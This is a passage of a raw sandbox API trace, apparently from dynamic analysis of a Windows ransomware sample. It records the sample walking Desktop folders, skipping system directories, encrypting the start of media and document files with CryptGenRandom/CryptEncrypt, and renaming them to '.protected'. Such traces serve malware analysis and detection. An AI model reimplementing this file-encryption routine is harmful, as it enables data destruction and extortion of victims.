dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.169] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.169] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.169] CloseHandle (hObject=0xd4) returned 1 [0091.170] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps.protected") returned 82 [0091.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\mxcky74gmvvbncjlcv.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\mxcky74GMvvBNcJLcV.pps.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\mxcky74gmvvbncjlcv.pps.protected")) returned 1 [0091.171] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.171] lstrcmpiW (lpString1="nJwznA2soJ6bFlT8CNWJ", lpString2="Windows") returned -1 [0091.171] lstrcmpiW (lpString1="nJwznA2soJ6bFlT8CNWJ", lpString2="Program Files") returned -1 [0091.171] lstrcmpiW (lpString1="nJwznA2soJ6bFlT8CNWJ", lpString2="Program Files (x86)") returned -1 [0091.171] lstrcmpiW (lpString1="nJwznA2soJ6bFlT8CNWJ", lpString2="$Recycle.bin") returned 1 [0091.171] lstrcmpiW (lpString1="nJwznA2soJ6bFlT8CNWJ", lpString2="System Volume Information") returned -1 [0091.171] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ") returned 70 
[0091.171] lstrcmpW (lpString1="nJwznA2soJ6bFlT8CNWJ", lpString2=".") returned 1 [0091.171] lstrcmpW (lpString1="nJwznA2soJ6bFlT8CNWJ", lpString2="..") returned 1 [0091.171] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\*") returned 72 [0091.171] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0091.171] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.171] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.171] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.171] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.171] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.171] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\.") returned 72 [0091.171] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.171] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0091.171] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.171] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.171] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.171] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.172] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.172] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\..") returned 73 [0091.172] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.172] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0091.172] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0091.172] lstrcmpiW (lpString1="5-oyH08kP_LNgi9EejZa.swf", lpString2="Windows") returned -1 [0091.172] lstrcmpiW (lpString1="5-oyH08kP_LNgi9EejZa.swf", lpString2="Program Files") returned -1 [0091.172] lstrcmpiW (lpString1="5-oyH08kP_LNgi9EejZa.swf", lpString2="Program Files (x86)") returned -1 [0091.172] lstrcmpiW (lpString1="5-oyH08kP_LNgi9EejZa.swf", lpString2="$Recycle.bin") returned 1 [0091.172] lstrcmpiW (lpString1="5-oyH08kP_LNgi9EejZa.swf", lpString2="System Volume Information") returned -1 [0091.172] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf") returned 95 [0091.172] StrStrIW (lpFirst="5-oyH08kP_LNgi9EejZa.swf", lpSrch=".protected") returned 0x0 [0091.172] lstrcmpW (lpString1="5-oyH08kP_LNgi9EejZa.swf", lpString2="RESTORE_FILES.txt") returned -1 [0091.172] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0091.172] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0091.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\5-oyh08kp_lngi9eejza.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0091.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf") returned 95 [0091.172] StrStrW (lpFirst="5-oyH08kP_LNgi9EejZa.swf", 
lpSrch=".txt") returned 0x0 [0091.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf") returned 95 [0091.172] StrStrW (lpFirst="5-oyH08kP_LNgi9EejZa.swf", lpSrch=".rar") returned 0x0 [0091.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf") returned 95 [0091.172] StrStrW (lpFirst="5-oyH08kP_LNgi9EejZa.swf", lpSrch=".zip") returned 0x0 [0091.172] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.173] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.173] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.173] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.173] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0091.173] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0091.174] CloseHandle (hObject=0xd8) returned 1 [0091.174] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf.protected") 
returned 105 [0091.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\5-oyh08kp_lngi9eejza.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\5-oyH08kP_LNgi9EejZa.swf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\5-oyh08kp_lngi9eejza.swf.protected")) returned 1 [0091.175] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0091.175] lstrcmpiW (lpString1="DsoHgMd_94Dqe", lpString2="Windows") returned -1 [0091.175] lstrcmpiW (lpString1="DsoHgMd_94Dqe", lpString2="Program Files") returned -1 [0091.175] lstrcmpiW (lpString1="DsoHgMd_94Dqe", lpString2="Program Files (x86)") returned -1 [0091.175] lstrcmpiW (lpString1="DsoHgMd_94Dqe", lpString2="$Recycle.bin") returned 1 [0091.175] lstrcmpiW (lpString1="DsoHgMd_94Dqe", lpString2="System Volume Information") returned -1 [0091.175] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe") returned 84 [0091.175] lstrcmpW (lpString1="DsoHgMd_94Dqe", lpString2=".") returned 1 [0091.175] lstrcmpW (lpString1="DsoHgMd_94Dqe", lpString2="..") returned 1 [0091.175] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\*") returned 86 [0091.175] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0091.175] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.175] lstrcmpiW (lpString1=".", 
lpString2="Program Files") returned -1 [0091.175] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.175] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.175] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.175] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\.") returned 86 [0091.175] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.175] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.175] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.175] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.175] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.175] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.175] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.175] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\..") returned 87 [0091.175] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.175] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.176] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.176] lstrcmpiW (lpString1="4NkOLGHL.m4a", lpString2="Windows") returned -1 [0091.176] lstrcmpiW (lpString1="4NkOLGHL.m4a", lpString2="Program Files") returned -1 [0091.176] lstrcmpiW (lpString1="4NkOLGHL.m4a", lpString2="Program Files (x86)") returned -1 [0091.176] lstrcmpiW (lpString1="4NkOLGHL.m4a", lpString2="$Recycle.bin") returned 1 [0091.176] lstrcmpiW (lpString1="4NkOLGHL.m4a", lpString2="System Volume Information") returned -1 [0091.176] wnsprintfW (in: 
pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a") returned 97 [0091.176] StrStrIW (lpFirst="4NkOLGHL.m4a", lpSrch=".protected") returned 0x0 [0091.176] lstrcmpW (lpString1="4NkOLGHL.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0091.176] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.176] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\4nkolghl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a") returned 97 [0091.176] StrStrW (lpFirst="4NkOLGHL.m4a", lpSrch=".txt") returned 0x0 [0091.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a") returned 97 [0091.176] StrStrW (lpFirst="4NkOLGHL.m4a", lpSrch=".rar") returned 0x0 [0091.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a") returned 97 [0091.176] StrStrW (lpFirst="4NkOLGHL.m4a", lpSrch=".zip") returned 0x0 [0091.176] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 
[0091.177] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.177] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.177] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.177] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.177] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.177] CloseHandle (hObject=0x14c) returned 1 [0091.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a.protected") returned 107 [0091.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\4nkolghl.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\4NkOLGHL.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\4nkolghl.m4a.protected")) returned 1 [0091.178] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.178] lstrcmpiW (lpString1="dbGaHWrA 
0a.wav", lpString2="Windows") returned -1 [0091.178] lstrcmpiW (lpString1="dbGaHWrA 0a.wav", lpString2="Program Files") returned -1 [0091.178] lstrcmpiW (lpString1="dbGaHWrA 0a.wav", lpString2="Program Files (x86)") returned -1 [0091.178] lstrcmpiW (lpString1="dbGaHWrA 0a.wav", lpString2="$Recycle.bin") returned 1 [0091.178] lstrcmpiW (lpString1="dbGaHWrA 0a.wav", lpString2="System Volume Information") returned -1 [0091.178] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav") returned 100 [0091.178] StrStrIW (lpFirst="dbGaHWrA 0a.wav", lpSrch=".protected") returned 0x0 [0091.178] lstrcmpW (lpString1="dbGaHWrA 0a.wav", lpString2="RESTORE_FILES.txt") returned -1 [0091.178] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.178] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\dbgahwra 0a.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav") returned 100 [0091.178] StrStrW (lpFirst="dbGaHWrA 0a.wav", lpSrch=".txt") returned 0x0 [0091.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav") returned 100 [0091.178] StrStrW (lpFirst="dbGaHWrA 0a.wav", 
lpSrch=".rar") returned 0x0 [0091.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav") returned 100 [0091.179] StrStrW (lpFirst="dbGaHWrA 0a.wav", lpSrch=".zip") returned 0x0 [0091.179] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.179] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.179] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.179] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.179] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.179] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.179] CloseHandle (hObject=0x14c) returned 1 [0091.180] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav.protected") returned 110 [0091.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\dbgahwra 0a.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\dbGaHWrA 0a.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\dbgahwra 0a.wav.protected")) returned 1 [0091.180] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.180] lstrcmpiW (lpString1="G7ClT0AmJ8fD fQ.odt", lpString2="Windows") returned -1 [0091.180] lstrcmpiW (lpString1="G7ClT0AmJ8fD fQ.odt", lpString2="Program Files") returned -1 [0091.180] lstrcmpiW (lpString1="G7ClT0AmJ8fD fQ.odt", lpString2="Program Files (x86)") returned -1 [0091.180] lstrcmpiW (lpString1="G7ClT0AmJ8fD fQ.odt", lpString2="$Recycle.bin") returned 1 [0091.180] lstrcmpiW (lpString1="G7ClT0AmJ8fD fQ.odt", lpString2="System Volume Information") returned -1 [0091.180] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt") returned 104 [0091.180] StrStrIW (lpFirst="G7ClT0AmJ8fD fQ.odt", lpSrch=".protected") returned 0x0 [0091.180] lstrcmpW (lpString1="G7ClT0AmJ8fD fQ.odt", lpString2="RESTORE_FILES.txt") returned -1 [0091.180] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.180] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\g7clt0amj8fd fq.odt"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.181] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt") returned 104 [0091.181] StrStrW (lpFirst="G7ClT0AmJ8fD fQ.odt", lpSrch=".txt") returned 0x0 [0091.181] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt") returned 104 [0091.181] StrStrW (lpFirst="G7ClT0AmJ8fD fQ.odt", lpSrch=".rar") returned 0x0 [0091.181] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 